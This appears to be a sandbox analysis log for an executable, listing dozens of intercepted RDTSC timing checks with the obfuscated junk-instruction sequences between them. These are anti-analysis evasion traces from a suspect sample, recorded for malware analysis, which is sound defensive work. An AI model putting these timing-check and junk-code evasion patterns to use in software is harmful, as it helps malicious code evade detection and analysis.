Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA3880 second address: CA3885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA3A93 second address: CA3A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CAA523 second address: CAA527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CAA527 second address: CAA55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F43E8C1FDDEh 0x0000000e push 00000000h 0x00000010 jmp 00007F43E8C1FDDFh 0x00000015 push 00000000h 0x00000017 mov ebx, esi 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CAA55A second address: CAA564 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA790D second address: CA7912 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA7912 second address: CA792F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43E91C5463h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA792F second address: CA7936 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA59C4 second address: CA59D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C4F891 second address: C4F89B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547A2 second address: C547AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547AC second address: C547D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43E8C1FDD6h 0x0000000a popad 0x0000000b push ebx 0x0000000c jng 00007F43E8C1FDD6h 0x00000012 jne 00007F43E8C1FDD6h 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F43E8C1FDDEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547D7 second address: C547DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547DB second address: C547E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547E7 second address: C547ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547ED second address: C547F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547F1 second address: C547F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C10 second address: CB5C2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C2F second address: CB5C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C39 second address: CB5C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C3D second address: CB5C41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C41 second address: CB5C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C47 second address: CB5C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C4D second address: CB5C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5E9E second address: CB5EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5FC8 second address: CB5FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB7C11 second address: CB7C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB7C15 second address: CB7C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F43E8C1FDEFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC905 second address: CBC909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC909 second address: CBC91D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F43E8C1FDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F43E8C1FDD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC91D second address: CBC921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC921 second address: CBC927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC927 second address: CBC92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC92D second address: CBC938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC404C second address: CC4069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F43E91C545Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC2D76 second address: CC2D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F43E8C1FDD6h 0x0000000a jns 00007F43E8C1FDD6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC2D89 second address: CC2D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC373F second address: CC3745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3890 second address: CC3896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3B79 second address: CC3B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3B7F second address: CC3BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43E91C545Fh 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F43E91C545Ch 0x00000013 jne 00007F43E91C5456h 0x00000019 popad 0x0000001a jmp 00007F43E91C5462h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007F43E91C545Ch 0x00000028 jc 00007F43E91C5456h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3D3C second address: CC3D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F43E8C1FDD8h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3D4C second address: CC3D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F43E91C5456h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3E9B second address: CC3EA7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F43E8C1FDD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3EA7 second address: CC3EDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5467h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c ja 00007F43E91C5456h 0x00000012 jmp 00007F43E91C545Dh 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3EDD second address: CC3EE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3EE3 second address: CC3EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C59A92 second address: C59AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F43E8C1FDD6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F43E8C1FDD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C59AA7 second address: C59AB7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC83BD second address: CC83C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC83C1 second address: CC83EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F43E91C5456h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F43E91C545Eh 0x00000019 pushad 0x0000001a popad 0x0000001b jp 00007F43E91C5456h 0x00000021 jmp 00007F43E91C545Ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC855F second address: CC8565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC86BB second address: CC86C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC8858 second address: CC885E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC885E second address: CC8868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC9126 second address: CC912A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC9294 second address: CC929A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC929A second address: CC92A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC92A0 second address: CC92B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F43E91C545Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC92B3 second address: CC92CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007F43E8C1FDD6h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F43E8C1FDDAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC9427 second address: CC943E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F43E91C5456h 0x00000009 jg 00007F43E91C5456h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC97E3 second address: CC97F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F43E8C1FDDEh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC97F9 second address: CC9824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jng 00007F43E91C546Fh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CCE43D second address: CCE45F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43E8C1FDD6h 0x00000008 jmp 00007F43E8C1FDDEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F43E8C1FDD6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CCE921 second address: CCE926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CCE926 second address: CCE93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43E8C1FDE2h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CCEF7F second address: CCEF8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F43E91C5456h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CD28BA second address: CD28BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9BF2E second address: C9BF58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7DE1DFEAh 0x0000000f sub dword ptr [ebp+122D3085h], esi 0x00000015 push 52CCAD9Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43E91C545Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C099 second address: C9C09F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C09F second address: C9C0F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F43E91C5458h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 pushad 0x00000027 movsx ebx, si 0x0000002a jng 00007F43E91C5459h 0x00000030 adc ch, 0000001Ah 0x00000033 popad 0x00000034 jmp 00007F43E91C5463h 0x00000039 nop 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C0F8 second address: C9C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C0FC second address: C9C106 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C106 second address: C9C12F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F43E8C1FDE1h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jp 00007F43E8C1FDDCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C2A6 second address: C9C2C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F43E91C5456h 0x00000009 jno 00007F43E91C5456h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 js 00007F43E91C546Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F43E91C5456h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C3E2 second address: C9C406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ecx, dword ptr [ebp+122D1B16h] 0x0000000e push 00000004h 0x00000010 add di, 4566h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F43E8C1FDDCh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9CB20 second address: C9CB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push esi 0x0000000a pop edi 0x0000000b or ch, FFFFFFB8h 0x0000000e lea eax, dword ptr [ebp+124816C1h] 0x00000014 xor dword ptr [ebp+122D2FAAh], edi 0x0000001a push eax 0x0000001b push esi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f je 00007F43E91C5456h 0x00000025 popad 0x00000026 pop esi 0x00000027 mov dword ptr [esp], eax 0x0000002a xor dword ptr [ebp+12448363h], eax 0x00000030 lea eax, dword ptr [ebp+1248167Dh] 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F43E91C5458h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 sub edx, 5845AE16h 0x00000056 jp 00007F43E91C545Ch 0x0000005c mov edx, dword ptr [ebp+122D1C81h] 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CD3344 second address: CD3348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CD3348 second address: CD334E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CD334E second address: CD3353 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CD34BD second address: CD34C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F43E91C5456h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CD34C7 second address: CD34F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F43E8C1FDD6h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F43E8C1FDE5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CDDB91 second address: CDDB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CDDE60 second address: CDDE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CDDE6C second address: CDDE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CDDE70 second address: CDDE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
